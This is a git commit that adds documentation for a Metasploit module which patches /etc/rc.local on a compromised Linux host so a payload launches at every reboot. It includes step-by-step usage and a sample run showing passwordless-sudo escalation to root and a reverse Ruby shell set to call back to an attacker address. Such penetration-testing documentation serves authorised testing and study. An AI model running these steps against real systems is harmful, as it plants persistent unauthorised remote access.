Document rc.local

2018-07-16 09:34:20 +02:00 · 2018-07-16 09:34:20 +02:00 · aa58634b24
parent 4f137f2f3f
commit aa58634b24
1 changed files with 46 additions and 0 deletions
--- a/documentation/modules/exploit/linux/local/rc_local_persistence.md
+++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md
@ -0,0 +1,46 @@
+## rc.local Persistence
+
+This module patch `/etc/rc.local` in order to launch a payload upon reboots.
+
+
+### Verification
+
+1. Exploit a box and get a **root** session (tip: try `post/multi/manage/sudo`)
+2. `use exploit/linux/local/rc_local_persistence`
+3. `set SESSION #`
+4. `set PAYLOAD #`
+5. `set LHOST ##`
+6. `exploit`
+
+
+### Sample run
+
+#### Escalate the session if needed
+
+```
+msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo 
+msf5 post(multi/manage/sudo) > set session 3
+session => 3
+msf5 post(multi/manage/sudo) > run
+
+[*] SUDO: Attempting to upgrade to UID 0 via sudo
+[*] No password available, trying a passwordless sudo.
+[+] SUDO: Root shell secured.
+[*] Post module execution completed
+```
+
+#### Persist
+
+```
+msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence
+msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby
+payload => cmd/unix/reverse_ruby
+msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41
+LHOST => 192.168.0.41`
+msf5 exploit(linux/local/rc_local_persistence) > run
+
+[*] Reading /etc/rc.local
+[*] Patching /etc/rc.local
+[*] Max line length is 65537
+[*] Writing 650 bytes in 1 chunks of 2251 bytes (octal-encoded), using printf
+```